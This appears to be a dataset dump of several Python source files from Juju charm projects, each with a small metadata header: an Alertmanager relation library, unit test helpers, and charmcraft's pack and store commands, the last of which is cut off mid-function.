'head first': np.array(arr_headfirst).astype('float32'),
'drain first': np.array(arr_drainfirst).astype('float32'),
'leak first': np.array(arr_leakfirst).astype('float32'),
'leak last': np.array(arr_leaklast).astype('float32')
}
return dataf
``` |
{
"source": "jnsgruk/alertmanager-operator",
"score": 2
} |
#### File: alertmanager_k8s/v0/alertmanager_dispatch.py
```python
import logging
from typing import List
import ops
from ops.charm import CharmBase, RelationEvent, RelationJoinedEvent, RelationRole
from ops.framework import EventBase, EventSource, Object, ObjectEvents
from ops.model import Relation
# The unique Charmhub library identifier, never change it
LIBID = "37f1ca6f8fe84e3092ebbf6dc2885310"
# Increment this major API version when introducing breaking changes
LIBAPI = 0
# Increment this PATCH version before using `charmcraft publish-lib` or reset
# to 0 if you are raising the major API version
LIBPATCH = 1
# Set to match metadata.yaml
INTERFACE_NAME = "alertmanager_dispatch"
logger = logging.getLogger(__name__)
class ClusterChanged(EventBase):
"""Event raised when an alertmanager cluster is changed.
If an alertmanager unit is added to or removed from a relation,
then a :class:`ClusterChanged` event should be emitted.
"""
class AlertmanagerConsumerEvents(ObjectEvents):
"""Event descriptor for events raised by `AlertmanagerConsumer`."""
cluster_changed = EventSource(ClusterChanged)
class RelationManagerBase(Object):
"""Base class that represents relation ends ("provides" and "requires").
:class:`RelationManagerBase` is used to create a relation manager. This is done by inheriting
from :class:`RelationManagerBase` and customising the sub class as required.
Attributes:
name (str): consumer's relation name
"""
def __init__(self, charm: CharmBase, relation_name: str, relation_role: RelationRole):
super().__init__(charm, relation_name)
self.charm = charm
self._validate_relation(relation_name, relation_role)
self.name = relation_name
def _validate_relation(self, relation_name: str, relation_role: RelationRole):
try:
if self.charm.meta.relations[relation_name].role != relation_role:
raise ValueError(
f"Relation '{relation_name}' in the charm's metadata.yaml must be "
f"'{relation_role}' to be managed by this library, but instead it is "
f"'{self.charm.meta.relations[relation_name].role}'"
)
if self.charm.meta.relations[relation_name].interface_name != INTERFACE_NAME:
raise ValueError(
f"Relation '{relation_name}' in the charm's metadata.yaml must use the "
f"'{INTERFACE_NAME}' interface to be managed by this library, but "
f"instead it is '{self.charm.meta.relations[relation_name].interface_name}'"
)
except KeyError:
raise ValueError(f"Relation '{relation_name}' is not in the charm's metadata.yaml")
class AlertmanagerConsumer(RelationManagerBase):
"""A "consumer" handler to be used by charms that relate to Alertmanager (the 'requires' side).
To have your charm consume alertmanager cluster data, declare the interface's use in your
charm's metadata.yaml file:
```yaml
requires:
alertmanager:
interface: alertmanager_dispatch
```
A typical example of importing this library might be
```python
from charms.alertmanager_k8s.v0.alertmanager_dispatch import AlertmanagerConsumer
```
In your charm's `__init__` method:
```python
self.alertmanager_consumer = AlertmanagerConsumer(self, relation_name="alertmanager")
```
Every change in the alertmanager cluster emits a :class:`ClusterChanged` event that the
consumer charm can register and handle, for example:
```
self.framework.observe(self.alertmanager_consumer.on.cluster_changed,
self._on_alertmanager_cluster_changed)
```
The updated alertmanager cluster can then be obtained via the `get_cluster_info` method
This consumer library expect the consumer charm to observe the `cluster_changed` event.
Arguments:
charm (CharmBase): consumer charm
relation_name (str): from consumer's metadata.yaml
Attributes:
charm (CharmBase): consumer charm
"""
on = AlertmanagerConsumerEvents()
def __init__(self, charm: CharmBase, relation_name: str = "alerting"):
super().__init__(charm, relation_name, RelationRole.requires)
self.framework.observe(
self.charm.on[self.name].relation_changed, self._on_relation_changed
)
self.framework.observe(
self.charm.on[self.name].relation_departed,
self._on_relation_departed,
)
self.framework.observe(self.charm.on[self.name].relation_broken, self._on_relation_broken)
def _on_relation_changed(self, event: ops.charm.RelationChangedEvent):
"""This hook notifies the charm that there may have been changes to the cluster."""
if event.unit: # event.unit may be `None` in the case of app data change
# inform consumer about the change
self.on.cluster_changed.emit()
def get_cluster_info(self) -> List[str]:
"""Returns a list of ip addresses of all the alertmanager units."""
alertmanagers: List[str] = []
if not (relation := self.charm.model.get_relation(self.name)):
return alertmanagers
for unit in relation.units:
if address := relation.data[unit].get("public_address"):
alertmanagers.append(address)
return sorted(alertmanagers)
def _on_relation_departed(self, _):
"""This hook notifies the charm that there may have been changes to the cluster."""
self.on.cluster_changed.emit()
def _on_relation_broken(self, _):
"""This hook notifies the charm that a relation has been completely removed."""
# inform consumer about the change
self.on.cluster_changed.emit()
class AlertmanagerProvider(RelationManagerBase):
"""A "provider" handler to be used by charms that relate to Alertmanager (the 'provides' side).
To have your charm provide alertmanager cluster data, declare the interface's use in your
charm's metadata.yaml file:
```yaml
provides:
alerting:
interface: alertmanager_dispatch
```
A typical example of importing this library might be
```python
from charms.alertmanager_k8s.v0.alertmanager_dispatch import AlertmanagerProvider
```
In your charm's `__init__` method:
```python
self.alertmanager_provider = AlertmanagerProvider(self, self._relation_name, self._api_port)
```
Then inform consumers on any update to alertmanager cluster data via
```python
self.alertmanager_provider.update_relation_data()
```
This provider auto-registers relation events on behalf of the main Alertmanager charm.
Arguments:
charm (CharmBase): consumer charm
relation_name (str): relation name (not interface name)
api_port (int): alertmanager server's api port; this is needed here to avoid accessing
charm constructs directly
Attributes:
charm (CharmBase): the Alertmanager charm
"""
def __init__(self, charm, relation_name: str = "alerting", api_port: int = 9093):
super().__init__(charm, relation_name, RelationRole.provides)
self._api_port = api_port
events = self.charm.on[self.name]
# No need to observe `relation_departed` or `relation_broken`: data bags are auto-updated
# so both events are address on the consumer side.
self.framework.observe(events.relation_joined, self._on_relation_joined)
@property
def api_port(self):
"""Get the API port number to use for alertmanager."""
return self._api_port
def _on_relation_joined(self, event: RelationJoinedEvent):
"""This hook stores the public address of the newly-joined "alerting" relation.
This is needed for consumers such as prometheus, which should be aware of all alertmanager
instances.
"""
self.update_relation_data(event)
def _generate_relation_data(self, relation: Relation):
"""Helper function to generate relation data in the correct format."""
public_address = (
f"{self.charm.model.get_binding(relation).network.bind_address}:{self.api_port}"
)
return {"public_address": public_address}
def update_relation_data(self, event: RelationEvent = None):
"""Helper function for updating relation data bags.
This function can be used in two different ways:
- update relation data bag of a given event (e.g. a newly joined relation);
- update relation data for all relations
Args:
event: The event whose data bag needs to be updated. If it is None, update data bags of
all relations.
"""
if event is None:
# update all existing relation data
# a single consumer charm's unit may be related to multiple providers
if self.name in self.charm.model.relations:
for relation in self.charm.model.relations[self.name]:
relation.data[self.charm.unit].update(self._generate_relation_data(relation))
else:
# update relation data only for the newly joined relation
event.relation.data[self.charm.unit].update(
self._generate_relation_data(event.relation)
)
```
#### File: tests/unit/helpers.py
```python
from typing import Callable, Dict
from unittest.mock import patch
def patch_network_get(private_address="10.1.157.116") -> Callable:
def network_get(*args, **kwargs) -> dict:
"""Patch for the not-yet-implemented testing backend needed for `bind_address`.
This patch decorator can be used for cases such as:
self.model.get_binding(event.relation).network.bind_address
"""
return {
"bind-addresses": [
{
"mac-address": "",
"interface-name": "",
"addresses": [{"hostname": "", "value": private_address, "cidr": ""}],
}
],
"egress-subnets": ["10.152.183.65/32"],
"ingress-addresses": ["10.152.183.65"],
}
return patch("ops.testing._TestingModelBackend.network_get", network_get)
def no_op(*args, **kwargs) -> None:
pass
def tautology(*args, **kwargs) -> bool:
return True
class PushPullMock:
"""Helper class for mocking filesystem operations."""
def __init__(self):
self._filesystem: Dict[str, str] = {}
def pull(self, path: str, *args, **kwargs) -> str:
return self._filesystem.get(path, "")
def push(self, path: str, source: str, *args, **kwargs) -> None:
self._filesystem[path] = source
def patch_push(self) -> Callable:
return patch("ops.testing._TestingPebbleClient.push", self.push)
def patch_pull(self) -> Callable:
return patch("ops.testing._TestingPebbleClient.pull", self.pull)
``` |
{
"source": "jnsgruk/charmcraft",
"score": 2
} |
#### File: charmcraft/commands/pack.py
```python
import logging
import zipfile
from argparse import Namespace
from charmcraft.cmdbase import BaseCommand, CommandError
from charmcraft.commands import build
from charmcraft.utils import (
SingleOptionEnsurer,
create_manifest,
load_yaml,
useful_filepath,
)
logger = logging.getLogger(__name__)
# the minimum set of files in a bundle
MANDATORY_FILES = {"bundle.yaml", "manifest.yaml", "README.md"}
def build_zip(zippath, basedir, fpaths):
"""Build the final file."""
zipfh = zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED)
for fpath in fpaths:
zipfh.write(fpath, fpath.relative_to(basedir))
zipfh.close()
def get_paths_to_include(config):
"""Get all file/dir paths to include."""
dirpath = config.project.dirpath
allpaths = set()
# all mandatory files
for fname in MANDATORY_FILES:
fpath = dirpath / fname
if not fpath.exists():
raise CommandError("Missing mandatory file: {}.".format(fpath))
allpaths.add(fpath)
# the extra files (relative paths)
for spec in config.parts:
fpaths = sorted(fpath for fpath in dirpath.glob(spec) if fpath.is_file())
logger.debug("Including per prime config %r: %s.", spec, fpaths)
allpaths.update(fpaths)
return sorted(allpaths)
_overview = """
Build and pack a charm operator package or a bundle.
You can `juju deploy` the resulting `.charm` or bundle's `.zip`
file directly, or upload it to Charmhub with `charmcraft upload`.
For the charm you must be inside a charm directory with a valid
`metadata.yaml`, `requirements.txt` including the `ops` package
for the Python operator framework, and an operator entrypoint,
usually `src/charm.py`. See `charmcraft init` to create a
template charm directory structure.
For the bundle you must already have a `bundle.yaml` (can be
generated by Juju) and a README.md file.
"""
class PackCommand(BaseCommand):
"""Build the bundle or the charm.
If charmcraft.yaml missing or its 'type' key indicates a charm,
use the "build" infrastructure to create the charm.
Otherwise pack the bundle.
"""
name = "pack"
help_msg = "Build the charm or bundle"
overview = _overview
needs_config = False # optional until we fully support charms here
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"-e",
"--entrypoint",
type=SingleOptionEnsurer(useful_filepath),
help=(
"The executable which is the operator entry point; defaults to 'src/charm.py'"
),
)
parser.add_argument(
"-r",
"--requirement",
action="append",
type=useful_filepath,
help=(
"File(s) listing needed PyPI dependencies (can be used multiple "
"times); defaults to 'requirements.txt'"
),
)
def run(self, parsed_args):
"""Run the command."""
# decide if this will work on a charm or a bundle
if self.config.type == "charm" or not self.config.project.config_provided:
self._pack_charm(parsed_args)
else:
if parsed_args.entrypoint is not None:
raise CommandError(
"The -e/--entry option is valid only when packing a charm"
)
if parsed_args.requirement is not None:
raise CommandError(
"The -r/--requirement option is valid only when packing a charm"
)
self._pack_bundle()
def _pack_charm(self, parsed_args):
"""Pack a charm."""
# adapt arguments to use the build infrastructure
parsed_args = Namespace(
**{
"from": self.config.project.dirpath,
"entrypoint": parsed_args.entrypoint,
"requirement": parsed_args.requirement,
}
)
# mimic the "build" command
validator = build.Validator()
args = validator.process(parsed_args)
logger.debug("working arguments: %s", args)
builder = build.Builder(args, self.config)
builder.run()
def _pack_bundle(self):
"""Pack a bundle."""
# get the config files
bundle_filepath = self.config.project.dirpath / "bundle.yaml"
bundle_config = load_yaml(bundle_filepath)
if bundle_config is None:
raise CommandError(
"Missing or invalid main bundle file: '{}'.".format(bundle_filepath)
)
bundle_name = bundle_config.get("name")
if not bundle_name:
raise CommandError(
"Invalid bundle config; missing a 'name' field indicating the bundle's name in "
"file '{}'.".format(bundle_filepath)
)
# so far 'pack' works for bundles only (later this will operate also on charms)
if self.config.type != "bundle":
raise CommandError(
"Bad config: 'type' field in charmcraft.yaml must be 'bundle' for this command."
)
# pack everything
project = self.config.project
manifest_filepath = create_manifest(project.dirpath, project.started_at)
try:
paths = get_paths_to_include(self.config)
zipname = project.dirpath / (bundle_name + ".zip")
build_zip(zipname, project.dirpath, paths)
finally:
manifest_filepath.unlink()
logger.info("Created '%s'.", zipname)
```
#### File: commands/store/__init__.py
```python
import ast
import hashlib
import json
import logging
import pathlib
import string
import tempfile
import textwrap
import zipfile
from collections import namedtuple
from operator import attrgetter
import yaml
from humanize import naturalsize
from tabulate import tabulate
from charmcraft.cmdbase import BaseCommand, CommandError
from charmcraft.utils import (
ResourceOption,
SingleOptionEnsurer,
get_templates_environment,
useful_filepath,
)
from .store import Store
from .registry import ImageHandler
logger = logging.getLogger("charmcraft.commands.store")
# some types
EntityType = namedtuple("EntityType", "charm bundle")(charm="charm", bundle="bundle")
ResourceType = namedtuple("ResourceType", "file oci_image")(
file="file", oci_image="oci-image"
)
LibData = namedtuple(
"LibData",
"lib_id api patch content content_hash full_name path lib_name charm_name",
)
OCIImageSpec = namedtuple("OCIImageSpec", "organization name reference")
# The token used in the 'init' command (as bytes for easier comparison)
INIT_TEMPLATE_TOKEN = b"TEMPLATE-TODO"
def get_name_from_metadata():
"""Return the name if present and plausible in metadata.yaml."""
try:
with open("metadata.yaml", "rb") as fh:
metadata = yaml.safe_load(fh)
charm_name = metadata["name"]
except (yaml.error.YAMLError, OSError, KeyError):
return
return charm_name
def create_importable_name(charm_name):
"""Convert a charm name to something that is importable in python."""
return charm_name.replace("-", "_")
def create_charm_name_from_importable(charm_name):
"""Convert a charm name from the importable form to the real form."""
# _ is invalid in charm names, so we know it's intended to be '-'
return charm_name.replace("_", "-")
class LoginCommand(BaseCommand):
"""Login to Charmhub."""
name = "login"
help_msg = "Login to Charmhub"
overview = textwrap.dedent(
"""
Login to Charmhub.
Charmcraft will provide a URL for the Charmhub login. When you have
successfully logged in, charmcraft will store a token for ongoing
access to Charmhub at the CLI.
Remember to `charmcraft logout` if you want to remove that token
from your local system, especially in a shared environment.
See also `charmcraft whoami` to verify that you are logged in.
"""
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.login()
logger.info("Logged in as '%s'.", store.whoami().username)
class LogoutCommand(BaseCommand):
"""Clear Charmhub token."""
name = "logout"
help_msg = "Logout from Charmhub and remove token"
overview = textwrap.dedent(
"""
Clear the Charmhub token.
Charmcraft will remove the local token used for Charmhub access.
This is important on any shared system because the token allows
manipulation of your published charms.
See also `charmcraft whoami` to verify that you are logged in,
and `charmcraft login`.
"""
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.logout()
logger.info("Charmhub token cleared.")
class WhoamiCommand(BaseCommand):
"""Show login information."""
name = "whoami"
help_msg = "Show your Charmhub login status"
overview = textwrap.dedent(
"""
Show your Charmhub login status.
See also `charmcraft login` and `charmcraft logout`.
"""
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.whoami()
data = [
("name:", result.name),
("username:", result.username),
("id:", result.userid),
]
table = tabulate(data, tablefmt="plain")
for line in table.splitlines():
logger.info(line)
class RegisterCharmNameCommand(BaseCommand):
"""Register a charm name in Charmhub."""
name = "register"
help_msg = "Register a charm name in Charmhub"
overview = textwrap.dedent(
"""
Register a charm name in Charmhub.
Claim a name for your operator in Charmhub. Once you have registered
a name, you can upload charm operator packages for that name and
release them for wider consumption.
Charmhub operates on the 'principle of least surprise' with regard
to naming. A charm with a well-known name should provide the best
operator for the microservice most people associate with that name.
Charms can be renamed in the Charmhub, but we would nonetheless ask
you to use a qualified name, such as `yourname-charmname` if you are
in any doubt about your ability to meet that standard.
We discuss registrations on Charmhub's Discourse:
https://discourse.charmhub.io/c/charm
Registration will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name to register in Charmhub")
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.register_name(parsed_args.name, EntityType.charm)
logger.info(
"You are now the publisher of charm %r in Charmhub.", parsed_args.name
)
class RegisterBundleNameCommand(BaseCommand):
"""Register a bundle name in the Store."""
name = "register-bundle"
help_msg = "Register a bundle name in the Store"
overview = textwrap.dedent(
"""
Register a bundle name in the Store.
Claim a name for your bundle in Charmhub. Once you have registered
a name, you can upload bundle packages for that name and
release them for wider consumption.
Charmhub operates on the 'principle of least surprise' with regard
to naming. A bundle with a well-known name should provide the best
system for the service most people associate with that name. Bundles
can be renamed in the Charmhub, but we would nonetheless ask
you to use a qualified name, such as `yourname-bundlename` if you are
in any doubt about your ability to meet that standard.
We discuss registrations on Charmhub's Discourse:
https://discourse.charmhub.io/c/charm
Registration will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name to register in Charmhub")
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.register_name(parsed_args.name, EntityType.bundle)
logger.info(
"You are now the publisher of bundle %r in Charmhub.", parsed_args.name
)
class ListNamesCommand(BaseCommand):
"""List the entities registered in Charmhub."""
name = "names"
help_msg = "List your registered charm and bundle names in Charmhub"
overview = textwrap.dedent(
"""
An overview of names you have registered to publish in Charmhub.
$ charmcraft names
Name Type Visibility Status
sabdfl-hello-world charm public registered
Visibility and status are shown for each name. `public` items can be
seen by any user, while `private` items are only for you and the
other accounts with permission to collaborate on that specific name.
Listing names will take you through login if needed.
"""
)
common = True
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_registered_names()
if not result:
logger.info("No charms or bundles registered.")
return
headers = ["Name", "Type", "Visibility", "Status"]
data = []
for item in result:
visibility = "private" if item.private else "public"
data.append(
[
item.name,
item.entity_type,
visibility,
item.status,
]
)
table = tabulate(data, headers=headers, tablefmt="plain")
for line in table.splitlines():
logger.info(line)
def get_name_from_zip(filepath):
"""Get the charm/bundle name from a zip file."""
try:
zf = zipfile.ZipFile(str(filepath))
except zipfile.BadZipFile:
raise CommandError("Cannot open {!r} (bad zip file).".format(str(filepath)))
# get the name from the given file (trying first if it's a charm, then a bundle,
# otherwise it's an error)
if "metadata.yaml" in zf.namelist():
try:
name = yaml.safe_load(zf.read("metadata.yaml"))["name"]
except Exception:
raise CommandError(
"Bad 'metadata.yaml' file inside charm zip {!r}: must be a valid YAML with "
"a 'name' key.".format(str(filepath))
)
elif "bundle.yaml" in zf.namelist():
try:
name = yaml.safe_load(zf.read("bundle.yaml"))["name"]
except Exception:
raise CommandError(
"Bad 'bundle.yaml' file inside bundle zip {!r}: must be a valid YAML with "
"a 'name' key.".format(str(filepath))
)
else:
raise CommandError(
"The indicated zip file {!r} is not a charm ('metadata.yaml' not found) "
"nor a bundle ('bundle.yaml' not found).".format(str(filepath))
)
return name
class UploadCommand(BaseCommand):
"""Upload a charm or bundle to Charmhub."""
name = "upload"
help_msg = "Upload a charm or bundle to Charmhub"
overview = textwrap.dedent(
"""
Upload a charm or bundle to Charmhub.
Push a charm or bundle to Charmhub where it will be verified.
This command will finish successfully once the package is
approved by Charmhub.
In the event of a failure in the verification process, charmcraft
will report details of the failure, otherwise it will give you the
new charm or bundle revision.
Upload will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"filepath", type=useful_filepath, help="The charm or bundle to upload"
)
parser.add_argument(
"--release",
action="append",
help="The channel(s) to release to (this option can be indicated multiple times)",
)
def _validate_template_is_handled(self, filepath):
"""Verify the zip does not have any file with the 'init' template TODO marker.
This is important to avoid uploading low-quality charms that are just
bootstrapped and not corrected.
"""
# we're already sure we can open it ok
zf = zipfile.ZipFile(str(filepath))
tainted_filenames = []
for name in zf.namelist():
content = zf.read(name)
if INIT_TEMPLATE_TOKEN in content:
tainted_filenames.append(name)
if tainted_filenames:
raise CommandError(
"Cannot upload the charm as it include the following files with a leftover "
"TEMPLATE-TODO token from when the project was created using the 'init' "
"command: {}".format(", ".join(tainted_filenames))
)
def run(self, parsed_args):
"""Run the command."""
name = get_name_from_zip(parsed_args.filepath)
self._validate_template_is_handled(parsed_args.filepath)
store = Store(self.config.charmhub)
result = store.upload(name, parsed_args.filepath)
if result.ok:
logger.info("Revision %s of %r created", result.revision, str(name))
if parsed_args.release:
# also release!
store.release(name, result.revision, parsed_args.release)
logger.info("Revision released to %s", ", ".join(parsed_args.release))
else:
logger.info("Upload failed with status %r:", result.status)
for error in result.errors:
logger.info("- %s: %s", error.code, error.message)
class ListRevisionsCommand(BaseCommand):
"""List revisions for a charm or a bundle."""
name = "revisions"
help_msg = "List revisions for a charm or a bundle in Charmhub"
overview = textwrap.dedent(
"""
Show version, date and status for each revision in Charmhub.
For example:
$ charmcraft revisions mycharm
Revision Version Created at Status
1 1 2020-11-15 released
Listing revisions will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of the charm or bundle")
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_revisions(parsed_args.name)
if not result:
logger.info("No revisions found.")
return
headers = ["Revision", "Version", "Created at", "Status"]
data = []
for item in sorted(result, key=attrgetter("revision"), reverse=True):
# use just the status or include error message/code in it (if exist)
if item.errors:
errors = ("{0.message} [{0.code}]".format(e) for e in item.errors)
status = "{}: {}".format(item.status, "; ".join(errors))
else:
status = item.status
data.append(
[
item.revision,
item.version,
item.created_at.strftime("%Y-%m-%d"),
status,
]
)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class ReleaseCommand(BaseCommand):
"""Release a charm or bundle revision to specific channels."""
name = "release"
help_msg = "Release a charm or bundle revision in one or more channels"
overview = textwrap.dedent(
"""
Release a charm or bundle revision in the channel(s) provided.
Charm or bundle revisions are not published for anybody else until you
release them in a channel. When you release a revision into a channel,
users who deploy the charm or bundle from that channel will get see
the new revision as a potential update.
A channel is made up of `track/risk/branch` with both the track and
the branch as optional items, so formally:
[track/]risk[/branch]
Channel risk must be one of stable, candidate, beta or edge. The
track defaults to `latest` and branch has no default.
It is enough just to provide a channel risk, like `stable` because
the track will be assumed to be `latest` and branch is not required.
Some channel examples:
stable
edge
2.0/candidate
beta/hotfix-23425
1.3/beta/feature-foo
When releasing a charm, one or more resources can be attached to that
release, using the `--resource` option, indicating in each case the
resource name and specific revision. For example, to include the
resource `thedb` revision 4 in the charm release, do:
charmcraft release mycharm --revision=14 \\
--channel=beta --resource=thedb:4
Listing revisions will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of charm or bundle")
parser.add_argument(
"-r",
"--revision",
type=SingleOptionEnsurer(int),
required=True,
help="The revision to release",
)
parser.add_argument(
"-c",
"--channel",
action="append",
required=True,
help="The channel(s) to release to (this option can be indicated multiple times)",
)
parser.add_argument(
"--resource",
action="append",
type=ResourceOption(),
default=[],
help=(
"The resource(s) to attach to the release, in the <name>:<revision> format "
"(this option can be indicated multiple times)"
),
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.release(
parsed_args.name,
parsed_args.revision,
parsed_args.channel,
parsed_args.resource,
)
msg = "Revision %d of charm %r released to %s"
args = [parsed_args.revision, parsed_args.name, ", ".join(parsed_args.channel)]
if parsed_args.resource:
msg += " (attaching resources: %s)"
args.append(
", ".join(
"{!r} r{}".format(r.name, r.revision) for r in parsed_args.resource
)
)
logger.info(msg, *args)
class StatusCommand(BaseCommand):
"""Show channel status for a charm or bundle."""
name = "status"
help_msg = "Show channel and released revisions"
overview = textwrap.dedent(
"""
Show channels and released revisions in Charmhub.
Charm revisions are not available to users until they are released
into a channel. This command shows the various channels for a charm
and whether there is a charm released.
For example:
$ charmcraft status
Track Channel Version Revision
latest stable - -
candidate - -
beta - -
edge 1 1
Showing channels will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of the charm or bundle")
def _build_resources_repr(self, resources):
"""Build a representation of a list of resources."""
if resources:
result = ", ".join("{} (r{})".format(r.name, r.revision) for r in resources)
else:
result = "-"
return result
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
channel_map, channels, revisions = store.list_releases(parsed_args.name)
if not channel_map:
logger.info("Nothing has been released yet.")
return
# build easier to access structures
releases_by_channel = {item.channel: item for item in channel_map}
revisions_by_revno = {item.revision: item for item in revisions}
# process and order the channels, while preserving the tracks order
all_tracks = []
per_track = {}
branch_present = False
for channel in channels:
# it's super rare to have a more than just a bunch of tracks (furthermore, normally
# there's only one), so it's ok to do this sequential search
if channel.track not in all_tracks:
all_tracks.append(channel.track)
nonbranches_list, branches_list = per_track.setdefault(
channel.track, ([], [])
)
if channel.branch is None:
# insert branch right after its fallback
for idx, stored in enumerate(nonbranches_list, 1):
if stored.name == channel.fallback:
nonbranches_list.insert(idx, channel)
break
else:
nonbranches_list.append(channel)
else:
branches_list.append(channel)
branch_present = True
headers = ["Track", "Channel", "Version", "Revision"]
resources_present = any(release.resources for release in channel_map)
if resources_present:
headers.append("Resources")
if branch_present:
headers.append("Expires at")
# show everything, grouped by tracks, with regular channels at first and
# branches (if any) after those
data = []
for track in all_tracks:
release_shown_for_this_track = False
shown_track = track
channels, branches = per_track[track]
for channel in channels:
description = channel.risk
# get the release of the channel, fallbacking accordingly
release = releases_by_channel.get(channel.name)
if release is None:
version = revno = resources = (
"↑" if release_shown_for_this_track else "-"
)
else:
release_shown_for_this_track = True
revno = release.revision
revision = revisions_by_revno[revno]
version = revision.version
resources = self._build_resources_repr(release.resources)
datum = [shown_track, description, version, revno]
if resources_present:
datum.append(resources)
data.append(datum)
# stop showing the track name for the rest of the track
shown_track = ""
for branch in branches:
description = "/".join((branch.risk, branch.branch))
release = releases_by_channel[branch.name]
expiration = release.expires_at.isoformat()
revision = revisions_by_revno[release.revision]
datum = ["", description, revision.version, release.revision]
if resources_present:
datum.append(self._build_resources_repr(release.resources))
datum.append(expiration)
data.append(datum)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class _BadLibraryPathError(CommandError):
"""Subclass to provide a specific error for a bad library path."""
def __init__(self, path):
super().__init__(
"Charm library path {} must conform to lib/charms/<charm>/vN/<libname>.py"
"".format(path)
)
class _BadLibraryNameError(CommandError):
"""Subclass to provide a specific error for a bad library name."""
def __init__(self, name):
super().__init__(
"Charm library name {!r} must conform to charms.<charm>.vN.<libname>".format(
name
)
)
def _get_positive_int(raw_value):
"""Convert the raw value for api/patch into a positive integer."""
value = int(raw_value)
if value < 0:
raise ValueError("negative")
return value
def _get_lib_info(*, full_name=None, lib_path=None):
"""Get the whole lib info from the path/file.
This will perform mutation of the charm name to create importable paths.
* `charm_name` and `libdata.charm_name`: `foo-bar`
* `full_name` and `libdata.full_name`: `charms.foo_bar.v0.somelib`
* paths, including `libdata.path`: `lib/charms/foo_bar/v0/somelib`
"""
if full_name is None:
# get it from the lib_path
try:
libsdir, charmsdir, importable_charm_name, v_api = lib_path.parts[:-1]
except ValueError:
raise _BadLibraryPathError(lib_path)
if libsdir != "lib" or charmsdir != "charms" or lib_path.suffix != ".py":
raise _BadLibraryPathError(lib_path)
full_name = ".".join((charmsdir, importable_charm_name, v_api, lib_path.stem))
else:
# build the path! convert a lib name with dots to the full path, including lib
# dir and Python extension.
# e.g.: charms.mycharm.v4.foo -> lib/charms/mycharm/v4/foo.py
try:
charmsdir, importable_charm_name, v_api, libfile = full_name.split(".")
except ValueError:
raise _BadLibraryNameError(full_name)
if charmsdir != "charms":
raise _BadLibraryNameError(full_name)
path = pathlib.Path("lib")
lib_path = path / charmsdir / importable_charm_name / v_api / (libfile + ".py")
# charm names in the path can contain '_' to be importable
# these should be '-', so change them back
charm_name = create_charm_name_from_importable(importable_charm_name)
if v_api[0] != "v" or not v_api[1:].isdigit():
raise CommandError(
"The API version in the library path must be 'vN' where N is an integer."
)
api_from_path = int(v_api[1:])
lib_name = lib_path.stem
if not lib_path.exists():
return LibData(
lib_id=None,
api=api_from_path,
patch=-1,
content_hash=None,
content=None,
full_name=full_name,
path=lib_path,
lib_name=lib_name,
charm_name=charm_name,
)
# parse the file and extract metadata from it, while hashing
metadata_fields = (b"LIBAPI", b"LIBPATCH", b"LIBID")
metadata = dict.fromkeys(metadata_fields)
hasher = hashlib.sha256()
with lib_path.open("rb") as fh:
for line in fh:
if line.startswith(metadata_fields):
try:
field, value = [x.strip() for x in line.split(b"=")]
except ValueError:
raise CommandError(
"Bad metadata line in {}: {!r}".format(lib_path, line)
)
metadata[field] = value
else:
hasher.update(line)
missing = [k.decode("ascii") for k, v in metadata.items() if v is None]
if missing:
raise CommandError(
"Library {} is missing the mandatory metadata fields: {}.".format(
lib_path, ", ".join(sorted(missing))
)
)
bad_api_patch_msg = (
"Library {} metadata field {} is not zero or a positive integer."
)
try:
libapi = _get_positive_int(metadata[b"LIBAPI"])
except ValueError:
raise CommandError(bad_api_patch_msg.format(lib_path, "LIBAPI"))
try:
libpatch = _get_positive_int(metadata[b"LIBPATCH"])
except ValueError:
raise CommandError(bad_api_patch_msg.format(lib_path, "LIBPATCH"))
if libapi == 0 and libpatch == 0:
raise CommandError(
"Library {} metadata fields LIBAPI and LIBPATCH cannot both be zero.".format(
lib_path
)
)
if libapi != api_from_path:
raise CommandError(
"Library {} metadata field LIBAPI is different from the version in the path.".format(
lib_path
)
)
bad_libid_msg = "Library {} metadata field LIBID must be a non-empty ASCII string."
try:
libid = ast.literal_eval(metadata[b"LIBID"].decode("ascii"))
except (ValueError, UnicodeDecodeError):
raise CommandError(bad_libid_msg.format(lib_path))
if not libid or not isinstance(libid, str):
raise CommandError(bad_libid_msg.format(lib_path))
content_hash = hasher.hexdigest()
content = lib_path.read_text()
return LibData(
lib_id=libid,
api=libapi,
patch=libpatch,
content_hash=content_hash,
content=content,
full_name=full_name,
path=lib_path,
lib_name=lib_name,
charm_name=charm_name,
)
def _get_libs_from_tree(charm_name=None):
"""Get library info from the directories tree (for a specific charm if specified).
It only follows/uses the the directories/files for a correct charmlibs
disk structure.
This can take charm_name as both importable and normal form.
"""
local_libs_data = []
if charm_name is None:
base_dir = pathlib.Path("lib") / "charms"
charm_dirs = sorted(base_dir.iterdir()) if base_dir.is_dir() else []
else:
importable_charm_name = create_importable_name(charm_name)
base_dir = pathlib.Path("lib") / "charms" / importable_charm_name
charm_dirs = [base_dir] if base_dir.is_dir() else []
for charm_dir in charm_dirs:
for v_dir in sorted(charm_dir.iterdir()):
